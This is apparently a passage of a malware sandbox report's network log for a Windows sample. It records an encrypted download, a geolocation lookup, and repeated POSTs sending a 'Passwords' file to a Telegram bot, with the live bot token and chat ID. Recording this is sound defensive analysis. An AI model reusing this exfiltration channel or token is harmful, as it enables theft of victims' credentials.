                                                                                                                2025-01-10 21:43:27 UTC1390INData Raw: 2a 89 1f 7a d2 44 28 b9 5b 1d ec 0d cb ee c1 84 25 ad 79 ae 37 eb 44 dd 6c 4a e5 51 49 ec b9 e3 cd c1 fc 11 39 a2 50 eb 54 71 2a e3 65 6b 1d 8f 40 68 bb ad 2e 68 f8 16 f7 81 cd 4e db 7f 48 94 2f 87 86 cd 58 c2 86 9a da 4f 4f 7c 26 38 68 44 2a e6 8c 02 ca 45 23 0a 22 da 0d d1 b2 e0 7e a5 cc 35 cf af aa 22 97 5f 63 26 ff f6 a2 3f d7 a3 8e b8 02 23 0e dc 61 88 fe 55 85 b0 60 d2 04 a5 56 08 56 86 ff 28 de 29 b4 a3 bf 5f 26 2b c5 42 b1 bf 84 ed 17 87 72 27 fd d0 47 33 93 b2 b9 f4 09 b2 d2 07 46 73 fd 82 5a 36 b3 1b bb 84 8f c1 6f 87 c1 b1 b3 f5 89 22 d3 cc 92 22 04 6e 20 7b 8b 47 1a 38 fc d6 3e 81 0b f7 8e 61 de 55 09 a1 10 d2 37 f9 ca 35 9b 94 48 4b a0 ab bb 1d fa 42 56 f9 78 3c 8b ab 21 a0 fb b9 76 d0 47 08 79 2a 9c ec f9 3c 49 38 cb ff 93 c7 73 48 07 f6 f4
                                                                                                                Data Ascii: *zD([%y7DlJQI9PTq*ek@h.hNH/XOO|&8hD*E#"~5"_c&?#aU`VV()_&+Br'G3FsZ6o""n {G8>aU75HKBVx<!vGy*<I8sH
                                                                                                                2025-01-10 21:43:27 UTC1390INData Raw: 61 1e 9c 6d 58 ef ef 2c 6f 53 b5 e0 4f ed 45 35 ec 77 d2 36 24 cd 94 a3 c8 97 03 0f 44 b8 d3 81 3c d8 53 f2 7e b0 0e 4e 4d 91 a9 23 98 96 66 9a 80 38 cf bc 5d 42 e3 18 97 f3 83 7b cf af f8 fa 27 07 c6 1d e0 f7 cc a7 fb 5a 88 f6 b5 b0 65 4e 89 37 d1 c9 74 26 b1 36 1b 9e 91 e4 ee b1 fa f0 b2 65 80 80 b4 44 d7 14 42 44 51 39 c2 e4 e6 cd da f2 63 dd 8f a8 9b 42 53 a0 e4 5c 27 0a 71 43 7f cd 08 cc 6d fe 6a e9 db 16 52 db 05 31 b8 2c d8 93 e7 41 a1 79 d7 c7 c4 67 a6 35 3f 5b 41 5f 38 8f 03 ba e7 0e 0c 2c 0a 40 d5 c0 bc 04 70 bc 97 ec bb b3 37 32 08 07 48 b9 93 cd 9a 75 86 93 ba 03 89 3a c7 61 3a c2 55 85 7d 9d 72 04 a3 4f 1e 4a fd d8 bb de 2d a3 bd 9f 00 2e 07 8c c4 96 bc 85 e9 1d e8 67 21 ea 0c 3b 31 83 b5 a2 da a3 52 2c fe aa 7a ec 55 5e ed 9a 3b b1 95 8f c4
                                                                                                                Data Ascii: amX,oSOE5w6$D<S~NM#f8]B{'ZeN7t&6eDBDQ9cBS\'qCmjR1,Ayg5?[A_8,@p72Hu:a:U}rOJ-.g!;1R,zU^;
                                                                                                                2025-01-10 21:43:27 UTC1390INData Raw: b7 8c e5 a7 04 c2 f1 3c 1a 25 6b 20 4a ac 40 b3 02 3e 41 b5 65 75 a3 aa 4d 85 7b 68 88 c3 a0 5a 8d b8 9a 17 57 4c d5 b0 60 f8 22 ea 9d 54 2c 50 65 70 58 3c 15 a9 f6 9e 5c ea 67 af c3 5e d3 55 87 92 86 74 b5 39 ee c3 88 d7 a5 87 7f ee 67 70 1b be ed 55 91 e6 3f 67 46 ac c1 24 a5 6d 36 e7 f7 d7 59 20 c8 94 a9 b6 95 15 d9 5d 97 56 86 2d d8 7e 1b 91 46 e5 b0 4c 5c b3 17 ba b3 98 9b 99 20 d0 b7 59 06 cb b2 9d 2d 89 6a e0 81 bb fa 27 0d d7 14 c8 71 cc a7 fd 1e 8c f6 b5 da 4f 6e 89 0f 7b c9 74 68 b9 27 1d f7 3d fc ee bd 94 25 b2 56 86 ef fa 44 c8 02 42 20 51 39 ce 85 d0 ee cb 86 39 71 8a a8 e1 5e 7b 27 cc a4 2d 1c 85 4b 69 f1 3c 2f 68 fe 1c 8c 24 97 52 dd 03 2f 34 75 9b 80 9b 3f 7f 55 9a dc 6f 50 c9 e6 3e 7e 51 3a 04 88 05 dc 56 2c 23 32 a9 65 cd ba 81 16 02 a4
                                                                                                                Data Ascii: <%k J@>AeuM{hZWL`"T,PepX<\g^Ut9gpU?gF$m6Y ]V-~FL\ Y-j'qOn{th'=%VDB Q99q^{'-Ki</h$R/4u?UoP>~Q:V,#2e
                                                                                                                2025-01-10 21:43:27 UTC1390INData Raw: 38 54 62 77 64 fe 77 a6 0e 93 0c c5 5f 22 61 dd a7 7c 11 88 1c d8 ce d2 39 23 93 b9 78 ff c0 aa 1b 1b 8d e1 3b 68 36 29 cf d5 6f 82 b0 58 92 f4 9d 5b 1e 08 82 77 78 79 e0 4f fd cd 27 3d cb b1 64 d0 3d 40 92 63 5a 88 91 39 9c da c5 11 76 0f 8e f4 a2 70 53 23 3c 6a 35 4f a9 38 f6 56 a5 8c 52 cc a6 69 62 89 8e 6f 4b f6 57 8e d4 7b 6c 9d dc 6f 04 6f 2b 76 95 77 f9 91 c8 f7 4e 1c 45 15 6f 2f 19 0c be ff 34 68 f7 67 97 ca 5e d3 98 77 89 97 77 04 18 fa a0 44 87 39 eb dd b6 a8 a5 1b b4 f8 4b ea f8 3a 4f d1 bd cc 0a f8 65 27 e5 5b 9b 5f 08 cf 95 a9 ad fd 06 0e 4e 9a 28 84 3d de 4a d3 fb b9 1a b6 5f 8b b2 3b 86 7e 99 88 99 22 d4 a1 8f 55 d8 b9 86 f8 a5 7c e2 6a a7 fa 2d 1c d2 7b 97 62 cc ad ec 40 a5 63 b5 b0 48 7d 8c 1f 7b c9 5f 0c b9 0f b6 ec 0d f2 e6 d0 92 57 2e
                                                                                                                Data Ascii: 8Tbwdw_"a|9#x;h6)oX[wxyO'=d=@cZ9vpS#<j5O8VRiboKW{loo+vwNEo/4hg^wwD9K:Oe'[_N(=J_;~"U|j-{b@cH}{_W.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.649921104.21.80.14436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:43:31 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:43:31 UTC851INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:43:31 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1860200
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jAizYeIZDYC4tXdCnCFizFhLXI96Kp3IAfTmx29yCdxEqAaekobaTURtGJ45SzXW1T98CByt7kHlB0GjInRHJwpZdGfgYVqmENvt6jrusW7nQqmLxE8QMu3BDzTafT1Rjv%2FSWUxe"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8fffd7d44fe97d0e-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1980&min_rtt=1977&rtt_var=749&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1454907&cwnd=244&unsent_bytes=0&cid=8ca92d1b18bb0539&ts=152&x=0"
                                                                                                                2025-01-10 21:43:31 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.649964149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:43:37 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd3195ed612844
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:43:37 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 39 35 65 64 36 31 32 38 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd3195ed612844Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:43:38 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:43:38 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:43:38 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 31 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43621,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545418,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.649978149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:43:39 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd31af086f28d9
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:43:39 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 61 66 30 38 36 66 32 38 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd31af086f28d9Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:43:40 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:43:40 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:43:40 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 32 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43622,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545420,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.649989149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:43:41 UTC274OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd31c547a1f7ec
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                2025-01-10 21:43:41 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 63 35 34 37 61 31 66 37 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd31c547a1f7ecContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:43:42 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:43:42 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:43:42 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 32 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43623,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545422,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.649992149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:43:43 UTC274OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd31db740fc421
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                2025-01-10 21:43:43 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 64 62 37 34 30 66 63 34 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd31db740fc421Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:43:44 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:43:44 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:43:44 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 32 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43624,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545424,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                7192.168.2.649995149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:43:45 UTC274OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd31eecc056063
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                2025-01-10 21:43:45 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 65 65 63 63 30 35 36 30 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd31eecc056063Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:43:45 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:43:45 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
